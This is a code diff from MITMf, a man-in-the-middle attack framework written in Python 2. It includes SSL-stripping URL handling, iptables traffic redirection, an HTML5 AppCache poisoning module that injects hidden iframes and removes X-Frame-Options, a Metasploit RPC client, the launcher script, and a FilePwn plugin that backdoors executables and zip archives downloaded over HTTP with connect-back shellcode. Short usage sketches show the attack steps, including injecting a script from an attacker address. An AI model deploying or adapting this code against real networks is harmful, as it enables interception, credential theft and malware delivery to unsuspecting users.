self.faviconSpoofing = False
self.hsts = False
self.app = False
self.caching = False
@staticmethod
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
#This is here because I'm lazy
def getResolverPort(self):
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def setCaching(self, value):
self.caching = value
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
url_set = set([from_url, to_url])
log.debug("Set redirection: {}".format(url_set))
self.redirects.append(url_set)
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
if pathIndex == -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
port = host[portIndex+1:]
host = host[0:portIndex]
if len(port) == 0:
port = 443
if self.hsts:
self.updateHstsConfig()
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
log.debug("SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
url = 'http://' + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+ self.sustitucion[host] + path
else:
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def updateHstsConfig(self):
for k,v in ConfigWatcher().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def setHstsBypass(self):
self.hsts = True
def setAppCachePoisoning(self):
self.app = True
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self, host):
log.debug("Parsing host: {}".format(host))
self.updateHstsConfig()
if self.real.has_key(host):
log.debug("Found host in list: {}".format(self.real[host]))
return self.real[host]
else:
log.debug("Host not in list: {}".format(host))
return host
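A short usage sketch of the monitor in plain (non-HSTS) mode; the client IP and URL are invented. ServerConnection registers each link it strips, and ClientRequest later asks whether an incoming plain-HTTP request should really be proxied over SSL:

monitor = URLMonitor.getInstance()
monitor.addSecureLink('10.0.0.42', 'http://mail.example.com/inbox')
print monitor.isSecureLink('10.0.0.42', 'http://mail.example.com/inbox')    # -> True
print monitor.getSecurePort('10.0.0.42', 'http://mail.example.com/inbox')   # -> 443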

View file

@ -1,102 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import logging
import re
import sys
from core.logger import logger
from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
formatter = logging.Formatter("%(asctime)s [Utils] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Utils", formatter)
def shutdown(message=None):
for plugin in ProxyPlugins().plugin_list:
plugin.on_shutdown()
sys.exit(message)
def set_ip_forwarding(value):
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def get_iface():
iface = get_working_if()
log.debug("Interface {} seems to be up and running")
return iface
def get_ip(interface):
try:
ip_address = get_if_addr(interface)
if (ip_address == "0.0.0.0") or (ip_address is None):
shutdown("Interface {} does not have an assigned IP address".format(interface))
return ip_address
except Exception as e:
shutdown("Error retrieving IP address from {}: {}".format(interface, e))
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
class iptables:
dns = False
http = False
smb = False
nfqueue = False
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def flush(self):
log.debug("Flushing iptables")
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
self.smb = False
self.nfqueue = False
def HTTP(self, http_redir_port):
log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
self.http = True
def DNS(self, dns_redir_port):
log.debug("Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
self.dns = True
def SMB(self, smb_redir_port):
log.debug("Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
self.smb = True
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True
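A hypothetical sequence showing how the helpers above are typically combined (requires root; the redirect ports are examples only):

set_ip_forwarding(1)

rules = iptables()
rules.flush()
rules.HTTP(10000)   # client port 80 -> local proxy listening on 10000
rules.DNS(5353)     # client port 53 -> local DNS server listening on 5353

# ... attack runs ...

rules.flush()
set_ip_forwarding(0)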

3
install-bdfactory.sh Executable file
View file

@ -0,0 +1,3 @@
#!/bin/bash
git submodule init
git submodule update

154
libs/AppCachePoisonClass.py Normal file
View file

@ -0,0 +1,154 @@
import logging, re, os.path, time
from datetime import date
from sslstrip.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):
'''
AppCachePoison performs an HTML5 AppCache poisoning attack - see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
'''
mass_poisoned_browsers = []
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.log(logging.DEBUG, "Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
return data
urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls)
if not s:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return data
logging.log(logging.WARNING, "Found URL %s in section %s" % (url, s['__name__']))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.log(logging.WARNING, "Poisoning tamper URL with template %s" % (p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
logging.log(logging.WARNING, "Poisoning manifest URL")
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
logging.log(logging.WARNING, "Poisoning raw URL")
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return data
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
logging.log(logging.WARNING, "Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
if section.get('tamper_url',False) == url:
return (section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (section, 'manifest',url)
if section.get('raw_url',False) == url:
return (section, 'raw',url)
return (False,'',urls.copy().pop())
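The poisoning itself comes down to the two substitutions used in tamper(): append a payload before </body> and point the <html> tag at a cache manifest so the result is kept offline. A standalone sketch with invented content:

import re

html = "<html><head></head><body><h1>Login</h1></body></html>"
appendix = "<script src='http://192.168.1.2/poison.js'></script>"   # invented payload
html = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", html)
html = re.sub(re.compile("<html", re.IGNORECASE), "<html manifest=\"/robots.txt\"", html)
print html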

@ -1 +0,0 @@
Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

88
libs/msfrpc.py Normal file
View file

@ -0,0 +1,88 @@
#! /usr/bin/env python
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
# Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
# Copyright (C) 2011 Trustwave
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
import requests
import msgpack
class Msfrpc:
class MsfError(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MsfAuthError(MsfError):
def __init__(self,msg):
self.msg = msg
def __init__(self, opts={}):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "55552"
self.uri = opts.get('uri') or "/api/"
self.ssl = opts.get('ssl') or False
self.token = None
self.headers = {"Content-type" : "binary/message-pack"}
def encode(self, data):
return msgpack.packb(data)
def decode(self, data):
return msgpack.unpackb(data)
def call(self, method, opts=[]):
if method != 'auth.login':
if self.token == None:
raise self.MsfAuthError("MsfRPC: Not Authenticated")
if method != "auth.login":
opts.insert(0, self.token)
if self.ssl == True:
url = "https://%s:%s%s" % (self.host, self.port, self.uri)
else:
url = "http://%s:%s%s" % (self.host, self.port, self.uri)
opts.insert(0, method)
payload = self.encode(opts)
r = requests.post(url, data=payload, headers=self.headers)
opts[:] = [] #Clear opts list
return self.decode(r.content)
def login(self, user, password):
auth = self.call("auth.login", [user, password])
try:
if auth['result'] == 'success':
self.token = auth['token']
return True
except:
raise self.MsfAuthError("MsfRPC: Authentication failed")
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = Msfrpc({})
# Login to the msgrpc server using the password "abc123"
client.login('msf','abc123')
# Get a list of the exploits from the server
mod = client.call('module.exploits')
# Grab the first item from the modules value of the returned dict
print "Compatible payloads for : %s\n" % mod['modules'][0]
# Get the list of compatible payloads for the first option
ret = client.call('module.compatible_payloads',[mod['modules'][0]])
for i in (ret.get('payloads')):
print "\t%s" % i

BIN
lock.ico

Binary file not shown. (Before: 558 B, After: 1.1 KiB)

5
logs/.gitignore vendored
View file

@ -1,5 +0,0 @@
*
!.gitignore
!responder/
!dns/
!ferret-ng/

2
logs/dns/.gitignore vendored
View file

@ -1,2 +0,0 @@
*
!.gitignore

View file

@ -1,2 +0,0 @@
*
!.gitignore

View file

@ -1,2 +0,0 @@
*
!.gitignore

245
mitmf.py
View file

@ -1,183 +1,94 @@
#!/usr/bin/env python2.7
#!/usr/bin/env python
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
import argparse
import sys
import os
import threading
import core.responder.settings as settings
from argparse import RawTextHelpFormatter
from twisted.web import http
from twisted.internet import reactor
from core.logger import logger
from core.banners import get_banner
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner
from sslstrip.ProxyPlugins import ProxyPlugins
import sys, logging, traceback, string, os
import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
print get_banner()
mitmf_version = "0.5"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if __name__ == "__main__":
if os.geteuid() != 0:
sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version,epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add sslstrip options
sgroup = parser.add_argument_group("sslstrip","Options for sslstrip library")
sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug','info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]',
epilog="Use wisely, young Padawan.",
formatter_class=RawTextHelpFormatter)
#add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
from core.netcreds import NetCreds
if options.read_pcap:
NetCreds().parse_pcap(options.read_pcap)
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
options.mac = get_mac(options.interface)
settings.Config.populate(options)
log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)
from core.proxyplugins import ProxyPlugins
ProxyPlugins().all_plugins = plugins
for plugin in plugins:
#load only the plugins that have been called at the command line
if vars(options)[plugin.optname] is True:
ProxyPlugins().add_plugin(plugin)
print "|_ {} v{}".format(plugin.name, plugin.version)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
plugin.setup_logger()
plugin.initialize(options)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
plugin.start_config_watch()
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
print "|_ PacketFilter online"
for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
#Initialize plugins
plugins = []
try:
pfilter.start()
except KeyboardInterrupt:
pfilter.stop()
shutdown()
for p in plugin_classes:
plugins.append(p())
except:
print "Failed to load plugin class %s" % str(p)
else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
#Give subgroup to each plugin with options
try:
for p in plugins:
if p.desc == "":
sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
else:
sgroup = parser.add_argument_group("%s" % p.name,p.desc)
sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
if p.has_opts:
p.add_options(sgroup)
except NotImplementedError:
print "Plugin %s claimed option support, but didn't have it." % p.name
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
args = parser.parse_args()
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
log_level = logging.__dict__[args.log_level.upper()]
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S", stream=args.write)
#All our options should be loaded now, pass them onto plugins
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
load = []
try:
for p in plugins:
if getattr(args,p.optname):
p.initialize(args)
load.append(p)
except NotImplementedError:
print "Plugin %s lacked initialize function." % p.name
reactor.listenTCP(options.listen_port, strippingFactory)
#Plugins are ready to go, start MITMf
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
for plugin in plugins:
if vars(options)[plugin.optname] is True:
plugin.reactor(strippingFactory)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
#Start mitmf-api
from core.mitmfapi import mitmfapi
print "|"
print "|_ MITMf-API online"
mitmfapi().start()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sergio-proxy v%s online" % sergio_version
reactor.run()
print "\n"
shutdown()
#cleanup on exit
for p in load:
p.finish()

23
plugins/AppCachePoison.py Normal file
View file

@ -0,0 +1,23 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg
if self.config_file == None:
self.config_file = "./config_files/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")

106
plugins/BrowserProfiler.py Normal file

File diff suppressed because one or more lines are too long

24
plugins/CacheKill.py Normal file
View file

@ -0,0 +1,24 @@
from plugins.plugin import Plugin
class CacheKill(Plugin):
name = "CacheKill Plugin"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader","connectionMade"]
has_opts = True
bad_headers = ['if-none-match','if-modified-since']
def add_options(self,options):
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
def handleHeader(self,request,key,value):
'''Handles all response headers'''
request.client.headers['Expires'] = "0"
request.client.headers['Cache-Control'] = "no-cache"
def connectionMade(self,request):
'''Handles outgoing request'''
request.headers['Pragma'] = 'no-cache'
for h in self.bad_headers:
if h in request.headers:
request.headers[h] = ""

296
plugins/FilePwn.py Normal file
View file

@ -0,0 +1,296 @@
################################################################################################
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
#################################################################################################
import sys, os
import pefile
import zipfile
import logging
import shutil
import random
import string
from bdfactory import pebin, elfbin
from plugins.plugin import Plugin
from tempfile import mkstemp
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
implements = ["handleResponse"]
has_opts = True
desc = "Backdoor executables being sent over http using bdfactory"
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg
if self.filepwncfg == None:
self.filepwncfg = "./config_files/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = ConfigObj(self.filepwncfg)
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
print "[*] FilePwn plugin online"
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
return result
except Exception as e:
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None
def zipGrinder(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file"
logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
logging.info("ZipFIle maxSize met %s" % len(aZipFile))
return aZipFile
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
tmpDir = '/tmp/' + tmpRan
tmpFile = '/tmp/' + tmpRan + '.zip'
os.mkdir(tmpDir)
with open(tmpFile, 'w') as f:
f.write(aZipFile)
zippyfile = zipfile.ZipFile(tmpFile, 'r')
#encryption test
try:
zippyfile.testzip()
except RuntimeError as e:
if 'encrypted' in str(e):
logging.info('Encrypted zipfile found. Not patching.')
return aZipFile
logging.info("ZipFile contents and info:")
for info in zippyfile.infolist():
